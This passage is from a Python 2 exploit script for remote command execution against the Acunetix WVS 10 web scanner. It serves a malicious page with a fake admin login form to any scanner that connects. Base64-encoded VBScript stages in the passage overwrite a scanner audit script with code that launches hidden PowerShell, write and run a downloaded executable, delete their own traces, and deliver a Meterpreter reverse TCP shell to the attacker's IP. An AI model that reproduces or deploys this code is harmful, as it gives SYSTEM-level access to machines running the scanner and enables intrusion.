"AgYmFja2dyb3VuZDogI2VjZjBmMTsNCiAgd2lkdGg6IDkwMHB4Ow0KICBoZWlnaHQ6IDg4cHg7DQogIHBvc2l0aW9uOiBhYnNvbHV0Z" \ + "TsNCiAgYm90dG9tOiAwcHg7DQogIGJvcmRlci1yYWRpdXM6IDBweCAwcHggMjBweCAyMHB4Ow0KICAtbW96LWJvcmRlci1yYWRpdXM6" \ + "IDBweCAwcHggMjBweCAyMHB4Ow0KICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDBweCAwcHggMjBweCAyMHB4Ow0KfQ0KDQouc3RhbmR" \ + "7DQogIHBvc2l0aW9uOiByZWxhdGl2ZTsgIA0KfQ0KDQouc3RhbmQ6YmVmb3Jlew0KICBjb250ZW50OiAiIjsNCiAgcG9zaXRpb246IG" \ + "Fic29sdXRlOw0KICBib3R0b206IC0xNTBweDsNCiAgYm9yZGVyLWJvdHRvbTogMTUwcHggc29saWQgI2JkYzNjNzsNCiAgYm9yZGVyL" \ + "WxlZnQ6IDMwcHggc29saWQgdHJhbnNwYXJlbnQ7DQogIGJvcmRlci1yaWdodDogMzBweCBzb2xpZCB0cmFuc3BhcmVudDsNCiAgd2lkd" \ + "Gg6IDIwMHB4Ow0KICBsZWZ0OiAwcHg7DQogIHJpZ2h0OiAwcHg7DQogIG1hcmdpbjogYXV0bzsNCn0NCg0KLnN0YW5kOmFmdGVyew0K" \ + "ICBjb250ZW50OiAiIjsNCiAgcG9zaXRpb246IGFic29sdXRlOw0KICB3aWR0aDogMjYwcHg7DQogIGxlZnQ6IDBweDsNCiAgcmlnaHQ6" \ + "IDBweDsNCiAgbWFyZ2luOiBhdXRvOw0KICBib3JkZXItYm90dG9tOiAzMHB4IHNvbGlkICNiZGMzYzc7DQogIGJvcmRlci1sZWZ0OiA" \ + "zMHB4IHNvbGlkIHRyYW5zcGFyZW50Ow0KICBib3JkZXItcmlnaHQ6IDMwcHggc29saWQgdHJhbnNwYXJlbnQ7DQogIGJvdHRvbTogLT" \ + "E4MHB4Ow0KICBib3gtc2hhZG93OiAwcHggNHB4IDBweCAjN2U3ZTdlDQp9DQoNCi5pbm5lci1zY3JlZW57DQogIHdpZHRoOiA4MDBwe" \ + "DsNCiAgaGVpZ2h0OiAzNDBweDsNCiAgYmFja2dyb3VuZDogIzFhYmM5ZDsNCiAgbWFyZ2luOiAwcHggYXV0bzsNCiAgcGFkZGluZy10" \ + "b3A6IDgwcHg7DQp9DQoNCi5mb3Jtew0KICB3aWR0aDogNDAwcHg7DQogIGhlaWdodDogMjMwcHg7DQogIGJhY2tncm91bmQ6ICNlZGV" \ + "mZjE7DQogIG1hcmdpbjogMHB4IGF1dG87DQogIHBhZGRpbmctdG9wOiAyMHB4Ow0KICBib3JkZXItcmFkaXVzOiAxMHB4Ow0KICAtbW" \ + "96LWJvcmRlci1yYWRpdXM6IDEwcHg7DQogIC13ZWJraXQtYm9yZGVyLXJhZGl1czogMTBweDsNCn0NCg0KaW5wdXRbdHlwZT0idGV4d" \ + "CJdew0KICBkaXNwbGF5OiBibG9jazsNCiAgd2lkdGg6IDMwOXB4Ow0KICBoZWlnaHQ6IDM1cHg7DQogIG1hcmdpbjogMTVweCBhdXRv" \ + "Ow0KICBiYWNrZ3JvdW5kOiAjZmZmOw0KICBib3JkZXI6IDBweDsNCiAgcGFkZGluZzogNXB4Ow0KICBmb250LXNpemU6IDE2cHg7DQo" \ + "gICBib3JkZXI6IDJweCBzb2xpZCAjZmZmOw0KICB0cmFuc2l0aW9uOiBhbGwgMC4zcyBlYXNlOw0KICBib3JkZXItcmFkaXVzOiA1cH" \ + "g7DQogIC1tb3otYm9yZGVyLXJhZGl1czogNXB4Ow0KICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDVweDsNCn0NCg0KaW5wdXRbdHlwZ" \ + "T0idGV4dCJdOmZvY3Vzew0KICBib3JkZXI6IDJweCBzb2xpZCAjMWFiYzlkDQp9DQoNCmlucHV0W3R5cGU9InN1Ym1pdCJdew0KICBk" \ + "aXNwbGF5OiBibG9jazsNCiAgYmFja2dyb3VuZDogIzFhYmM5ZDsNCiAgd2lkdGg6IDMxNHB4Ow0KICBwYWRkaW5nOiAxMnB4Ow0KICB" \ + "jdXJzb3I6IHBvaW50ZXI7DQogIGNvbG9yOiAjZmZmOw0KICBib3JkZXI6IDBweDsNCiAgbWFyZ2luOiBhdXRvOw0KICBib3JkZXItcm" \ + "FkaXVzOiA1cHg7DQogIC1tb3otYm9yZGVyLXJhZGl1czogNXB4Ow0KICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDVweDsNCiAgZm9u" \ + "dC1zaXplOiAxN3B4Ow0KICB0cmFuc2l0aW9uOiBhbGwgMC4zcyBlYXNlOw0KfQ0KDQppbnB1dFt0eXBlPSJzdWJtaXQiXTpob3ZlcnsN" \ + "CiAgYmFja2dyb3VuZDogIzA5Y2NhNg0KfQ0KDQphew0KICB0ZXh0LWFsaWduOiBjZW50ZXI7DQogIGZvbnQtZmFtaWx5OiBBcmlhbDs" \ + "NCiAgY29sb3I6IGdyYXk7DQogIGRpc3BsYXk6IGJsb2NrOw0KICBtYXJnaW46IDE1cHggYXV0bzsNCiAgdGV4dC1kZWNvcmF0aW9uOi" \ + "Bub25lOw0KICB0cmFuc2l0aW9uOiBhbGwgMC4zcyBlYXNlOw0KICBmb250LXNpemU6IDEycHg7DQp9DQoNCmE6aG92ZXJ7DQogIGNvb" \ + "G9yOiAjMWFiYzlkOw0KfQ0KDQoNCjo6LXdlYmtpdC1pbnB1dC1wbGFjZWhvbGRlciB7DQogICBjb2xvcjogZ3JheTsNCn0NCg0KOi1" \ + "tb3otcGxhY2Vob2xkZXIgeyAvKiBGaXJlZm94IDE4LSAqLw0KICAgY29sb3I6IGdyYXk7ICANCn0NCg0KOjotbW96LXBsYWNlaG9sZG" \ + "VyIHsgIC8qIEZpcmVmb3ggMTkrICovDQogICBjb2xvcjogZ3JheTsgIA0KfQ0KDQo6LW1zLWlucHV0LXBsYWNlaG9sZGVyIHsgIA0KI" \ + "CAgY29sb3I6IGdyYXk7ICANCn0NCjwvc3R5bGU+DQo8aDE+QWRtaW4gcGFuZWw8L2gxPg0KPGRpdiBjbGFzcz0ic3RhbmQiPg0KICA8" \ + "ZGl2IGNsYXNzPSJvdXRlci1zY3JlZW4iPg0KICAgIDxkaXYgY2xhc3M9ImlubmVyLXNjcmVlbiI+DQogICAgICA8ZGl2IGNsYXNzPSJ" \ + "mb3JtIj4NCiAgICAgIDxmb3JtIG1ldGhvZD0icG9zdCIgYWN0aW9uPSIvbG9naW4iPg0KICAgICAgICA8aW5wdXQgdHlwZT0idGV4dC" \ + "IgbmFtZT0idXNyIiBwbGFjZWhvbGRlcj0iVXNlcm5hbWUiIC8+DQogICAgICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwd2QiI" \ + "HBsYWNlaG9sZGVyPSJQYXNzd29yZCIgLz4NCiAgICAgICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJMb2dpbiIgLz4NCiAg" \ + "ICAgICAgIDwvZm9ybT4NCiAgICAgICAgPGEgaHJlZj0iL2ZvcmdvdCI+TG9zdCB5b3VyIHBhc3N3b3JkPzwvYT4NCiAgICAgIDwvZGl" \ + "2PiANCiAgICA8L2Rpdj4gDQogIDwvZGl2PiANCjwvZGl2Pg==" + +# param NO +EXPLOIT_STAGE_2 = "U2V0IGZzbyA9IENyZWF0ZU9iamVjdCgiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3QiKQ0KRnVuY3Rpb24gRXNjYWxhdGVBbm" \ + "RFeGVjdXRlKCkNCiAgYmluZCA9ICJTZXQgb2JqID0gQ3JlYXRlT2JqZWN0KCIiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3Q" \ + "iIikiICYgdmJjcmxmICZfDQogICJvYmouRGVsZXRlRmlsZSgiIkM6XFByb2dyYW1EYXRhXEFjdW5ldGl4IFdWUyAxMFxEYXRhX" \ + "FNjcmlwdHNcUGVyU2VydmVyXEFKUF9BdWRpdC5zY3JpcHQiIikiICYgdmJjcmxmICZfDQogICAib2JqLk1vdmVGaWxlICIiQzp" \ + "cUHJvZ3JhbURhdGFcQWN1bmV0aXggV1ZTIDEwXERhdGFcU2NyaXB0c1xQZXJTZXJ2ZXJcQUpQX0F1ZGl0LnNjcmlwdC5iYWsiI" \ + "iwgIiJDOlxQcm9ncmFtRGF0YVxBY3VuZXRpeCBXVlMgMTBcRGF0YVxTY3JpcHRzXFBlclNlcnZlclxBSlBfQXVkaXQuc2NyaXB" \ + "0IiIgIiAmIHZiY3JsZiAmXw0KICAiRnVuY3Rpb24gUkVPbnJZSmUoKSIgJiB2YmNybGYgJl8NCiAgIk5tU1ROUFVyb0lLdFRxID" \ + "0gIiIlcyIiIiAmIHZiY3JsZiAmXw0KICAiRGltIGdVdERzem1uR050IiAmIHZiQ3JsZiAmXw0KICAiU2V0IGdVdERzem1uR050I" \ + "D0gQ3JlYXRlT2JqZWN0KCIiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3QiIikiICYgdmJjcmxmICZfDQogICJEaW0gaE1XRkN" \ + "6dUciICYgdmJjcmxmICZfDQogICJEaW0gZXJtbVRDalJ4SWpjWEciICYgdmJjcmxmICZfDQogICJEaW0ga0xrdVdOYnhuTFVIe" \ + "HR6IiAmIHZiY3JsZiAmXw0KICAiRGltIHJDUWNUekFBalJ4dSIgJiB2YmNybGYgJl8NCiAgIlNldCBlcm1tVENqUnhJamNYRyA" \ + "9IGdVdERzem1uR050LkdldFNwZWNpYWxGb2xkZXIoMikiICYgdmJjcmxmICZfDQogICJyQ1FjVHpBQWpSeHUgPSBlcm1tVENqU" \ + "nhJamNYRyAmICIiXCIiICYgZ1V0RHN6bW5HTnQuR2V0VGVtcE5hbWUoKSIgJiB2YmNybGYgJl8NCiAgImdVdERzem1uR050LkN" \ + "yZWF0ZUZvbGRlcihyQ1FjVHpBQWpSeHUpIiAmIHZiY3JsZiAmXw0KICAia0xrdVdOYnhuTFVIeHR6ID0gckNRY1R6QUFqUnh1I" \ + "CYgIiJcIiIgJiAiIk5ObWxmVmhqYld3emNqLmV4ZSIiIiAmIHZiY3JsZiAmXw0KICAiU2V0IGhNV0ZDenVHID0gZ1V0RHN6bW5" \ + "HTnQuQ3JlYXRlVGV4dEZpbGUoa0xrdVdOYnhuTFVIeHR6LCB0cnVlICwgZmFsc2UpICIgJiB2YmNybGYgJl8NCiAgIkZvciBpI" \ + "D0gMSB0byBMZW4oTm1TVE5QVXJvSUt0VHEpIFN0ZXAgMiIgJiB2YmNybGYgJl8NCiAgIiAgICBoTVdGQ3p1Ry5Xcml0ZSBDaHI" \ + "oQ0xuZygiIiZIIiIgJiBNaWQoTm1TVE5QVXJvSUt0VHEsaSwyKSkpIiAmIHZiY3JsZiAmXw0KICAiTmV4dCIgJiB2YmNybGYgJ" \ + "l8NCiAgImhNV0ZDenVHLkNsb3NlIiAmIHZiY3JsZiAmXw0KICAiRGltIHlFU3pGdUlNb211IiAmIHZiY3JsZiAmXw0KICAiU2V" \ + "0IHlFU3pGdUlNb211ID0gQ3JlYXRlT2JqZWN0KCIiV3NjcmlwdC5TaGVsbCIiKSIgJiB2YmNybGYgJl8NCiAgInlFU3pGdUlNb" \ + "211LnJ1biBrTGt1V05ieG5MVUh4dHoiICYgdmJjcmxmICZfDQogICInZ1V0RHN6bW5HTnQuRGVsZXRlRmlsZShrTGt1V05ieG5" \ + "MVUh4dHopIiAmIHZiY3JsZiAmXw0KICAiJ2dVdERzem1uR050LkRlbGV0ZUZvbGRlcihyQ1FjVHpBQWpSeHUpIiAmIHZiY3JsZ" \ + "iAmXw0KIkVuZCBGdW5jdGlvbiIgJiB2YmNybGYgJl8NCiJSRU9ucllKZSIgJiB2YmNybGYgJl8NCiJDcmVhdGVPYmplY3QoIiJ" \ + "TY3JpcHRpbmcuRmlsZVN5c3RlbU9iamVjdCIiKS5EZWxldGVGaWxlIFdTY3JpcHQuU2NyaXB0RnVsbE5hbWUiICYgdmJjcmxmI" \ + "CZfDQoiV1NjcmlwdC5RdWl0Ig0KICBjd2QgPSBDcmVhdGVPYmplY3QoIldTY3JpcHQuU2hlbGwiKS5FeHBhbmRFbnZpcm9ubWV" \ + "udFN0cmluZ3MoIiVzIikgJiAiXHN0YWdlbGFzdC52YnMiDQogIFNldCBvYmpGaWxlQmluZCA9IGZzby5DcmVhdGVUZXh0RmlsZS" \ + "hjd2QgLFRydWUpDQogIG9iakZpbGVCaW5kLldyaXRlIGJpbmQgJiB2YkNyTGYNCiAgb2JqRmlsZUJpbmQuQ2xvc2UNCiAgDQog" \ + "IGpzID0gInZhciBzaGVsbCA9IG5ldyBBY3RpdmVYT2JqZWN0KCIiV1NjcmlwdC5TaGVsbCIiKTsiJiB2YmNybGYgJiAic2hlbG" \ + "wucnVuKCdjbWQgL0Mgc3RhcnQgL0IgIiIiIiAiInBvd2Vyc2hlbGwiIiAtd2luZG93c3R5bGUgaGlkZGVuIC1jb21tYW5kICIi" \ + "d3NjcmlwdCAiICYgUmVwbGFjZShjd2QsIlwiLCJcXCIpICYgIiIiJyk7Ig0KICBmc28uTW92ZUZpbGUgIkM6XFByb2dyYW1EYX" \ + "RhXEFjdW5ldGl4IFdWUyAxMFxEYXRhXFNjcmlwdHNcUGVyU2VydmVyXEFKUF9BdWRpdC5zY3JpcHQiLCAiQzpcUHJvZ3JhbURh" \ + "dGFcQWN1bmV0aXggV1ZTIDEwXERhdGFcU2NyaXB0c1xQZXJTZXJ2ZXJcQUpQX0F1ZGl0LnNjcmlwdC5iYWsiDQogIFNldCBvYm" \ + "pGaWxlID0gZnNvLkNyZWF0ZVRleHRGaWxlKCJDOlxQcm9ncmFtRGF0YVxBY3VuZXRpeCBXVlMgMTBcRGF0YVxTY3JpcHRzXFBl" \ + "clNlcnZlclxBSlBfQXVkaXQuc2NyaXB0IixUcnVlKQ0KICBvYmpGaWxlLldyaXRlIGpzICYgdmJDckxmDQogIG9iakZpbGUuQ2" \ + "xvc2UNCiAgeSA9IE1vbnRoKE5vdykgJiAiLyIgJiBEYXkoTm93KSAmICIvIiAmIFllYXIoTm93KQ0KICBoID0gSG91cihOb3cp" \ + "ICYgIjoiJiBNaW51dGUoTm93KSsxDQogIHNSZXF1ZXN0ID0gInsiInNjYW5UeXBlIiI6IiJzY2FuIiIsIiJ0YXJnZXRMaXN0Ii" \ + "I6IiIiIiwiInRhcmdldCIiOlsiImh0dHA6Ly93d3cuZ29vZ2xlLml0IiJdLCIicmVjdXJzZSIiOiIiLTEiIiwiImRhdGUiIjoi" \ + "IiIgJiB5ICYgIiIiLCIiZGF5T2ZXZWVrIiI6IiIxIiIsIiJkYXlPZk1vbnRoIiI6IiIxIiIsIiJ0aW1lIiI6IiIiICYgaCAmIC" \ + "IiIiwiImRlbGV0ZUFmdGVyQ29tcGxldGlvbiIiOiIiRmFsc2UiIiwiInBhcmFtcyIiOnsiInByb2ZpbGUiIjoiIkRlZmF1bHQi" \ + "IiwiImxvZ2luU2VxIiI6IiI8bm9uZT4iIiwiInNldHRpbmdzIiI6IiJEZWZhdWx0IiIsIiJzY2FubmluZ21vZGUiIjoiImhldX" \ + "Jpc3RpYyIiLCIiZXhjbHVkZWRob3VycyIiOiIiPG5vbmU+IiIsIiJzYXZldG9kYXRhYmFzZSIiOiIiVHJ1ZSIiLCIic2F2ZWxv" \ + "Z3MiIjoiIkZhbHNlIiIsIiJnZW5lcmF0ZXJlcG9ydCIiOiIiRmFsc2UiIiwiInJlcG9ydGZvcm1hdCIiOiIiUERGIiIsIiJyZX" \ + "BvcnR0ZW1wbGF0ZSIiOiIiV1ZTRGV2ZWxvcGVyUmVwb3J0LnJlcCIiLCIiZW1haWxhZGRyZXNzIiI6IiIiIn19Ig0KICBzZXQg" \ + "b0hUVFAgPSBDcmVhdGVPYmplY3QoIk1pY3Jvc29mdC5YTUxIVFRQIikNCiAgb0hUVFAub3BlbiAiUE9TVCIsICJodHRwOi8vMT" \ + "I3LjAuMC4xOjgxODMvYXBpL2FkZFNjYW4iLCBmYWxzZQ0KICBvSFRUUC5zZXRSZXF1ZXN0SGVhZGVyICJDb250ZW50LVR5cGUi" \ + "LCAiYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkIg0KICBvSFRUUC5zZXRSZXF1ZXN0SGVhZGVyICJYLVJlcXVlc3" \ + "RlZC1XaXRoIiwgIlhNTEh0dHBSZXF1ZXN0Ig0KICBvSFRUUC5zZXRSZXF1ZXN0SGVhZGVyICJBY2NlcHQiLCAiYXBwbGljYXRp" \ + "b24vanNvbiwgdGV4dC9qYXZhc2NyaXB0LCAqLyo7IHE9MC4wMSINCiAgb0hUVFAuc2V0UmVxdWVzdEhlYWRlciAiQ29udGVudC" \ + "1UeXBlIiwgImFwcGxpY2F0aW9uL2pzb247IGNoYXJzZXQ9VVRGLTgiDQogIG9IVFRQLnNldFJlcXVlc3RIZWFkZXIgIlJlcXVl" \ + "c3RWYWxpZGF0ZWQiLCAgInRydWUiDQogIG9IVFRQLnNldFJlcXVlc3RIZWFkZXIgIkNvbnRlbnQtTGVuZ3RoIiwgTGVuKHNSZX" \ + "F1ZXN0KQ0KICBvSFRUUC5zZW5kIHNSZXF1ZXN0DQogRW5kIEZ1bmN0aW9uDQogDQogRXNjYWxhdGVBbmRFeGVjdXRlDQogZnNv" \ + "LkRlbGV0ZUZpbGUgV1NjcmlwdC5TY3JpcHRGdWxsTmFtZQ0KIFdTY3JpcHQuUXVpdA==" + + +class myHandler(BaseHTTPRequestHandler): + timeout = 5 + server_version = "Apache" + sys_version = "1.2" + + def log_message(self, format, *args): + try: + paths = str(list(args)[0]) + if "prompt" in paths or "confirm" in paths or "alert" in paths: + print "[*] Triggering EXPLOIT_STAGE_1 + PAYLOAD_DOWNLOAD_EXEC sending (%s) bytes !" % \ + (len(PAYLOAD_DOWNLOAD_EXEC) + len(EXPLOIT_STAGE_1)) + if "stage2" in paths: + print "[*] Triggering EXPLOIT_STAGE_2 sending (%s) bytes !" % len(EXPLOIT_STAGE_2) + return + except: + pass + return + + def do_POST(self): + PDE = base64.b64decode(PAYLOAD_DOWNLOAD_EXEC) % (sys.argv[2] + ":" + sys.argv[1], + "%TEMP%", gen_random_name(12)) + data = self.rfile.read(int(self.headers.getheader("Content-Length"))) + data = data.split("&") + self.send_response(200) + self.send_header('Content-type', 'text/html') + self.end_headers() + for param in data: + if "usr" in param: + param = param.split("=")[1] + self.wfile.write(base64.b64decode(EXPLOIT_STAGE_1) + % (base64.b64encode("".join(x + "\x00" for x in PDE)), + ("Bad password for user %s , try again." % param))) + return + self.wfile.write(base64.b64decode(EXPLOIT_STAGE_1) + % (base64.b64encode("".join(x + "\x00" for x in PDE)), + "Some data are missing , try again.")) + return + + def do_GET(self): + try: + if self.path == "/": + self.send_response(302) + self.send_header('Content-type', 'text/html') + self.send_header('Location', "login") + self.end_headers() + # Send the html message + self.wfile.write("Here") + return + elif self.path == "/stage2": + self.send_response(200) + self.send_header('Content-type', 'text/plain') + self.end_headers() + # Send the html message + self.wfile.write(base64.b64decode(EXPLOIT_STAGE_2) + % (PAYLOAD_METERPETRER % ip2b(sys.argv[2]), "%TEMP%")) + postexpthread = Thread(target=postexploitation, args=(self.client_address[0], )) + postexpthread.start() + return + else: + string = "" + try: + string = self.path.split("=")[1] + except: + pass + self.send_response(200) + self.send_header('Content-type', 'text/html') + self.end_headers() + # Send the html message + PDE = base64.b64decode(PAYLOAD_DOWNLOAD_EXEC) % (sys.argv[2] + ":" + sys.argv[1], + "%TEMP%", gen_random_name(12)) + self.wfile.write(base64.b64decode(EXPLOIT_STAGE_1) + % (base64.b64encode("".join(x + "\x00" for x in PDE)), base64.b64decode(LOGIN_FORM))) + return + except Exception as e: + print e.message + self.send_response(200) + self.send_header('Content-type', 'text/plain') + self.end_headers() + self.wfile.write("") + return + +if __name__ == "__main__": + print "\n\nAcunetix WVS 10 - SYSTEM Remote Command Execution (Daniele Linguaglossa)\n" \ + "Payload: Meterpreter reverse TCP 4444" + try: + if len(sys.argv) > 2: + # Create a web server and define the handler to manage the + # incoming request + server = HTTPServer(('0.0.0.0', int(sys.argv[1])), myHandler) + print 'Exploit started on port *:%s' % sys.argv[1] + print '[+] Waiting for scanner...' + + # Wait forever for incoming http requests + server.serve_forever() + else: + print "Usage: %s " % os.path.basename(sys.argv[0]) + + except KeyboardInterrupt: + print '^C received, shutting down the web server' + server.socket.close()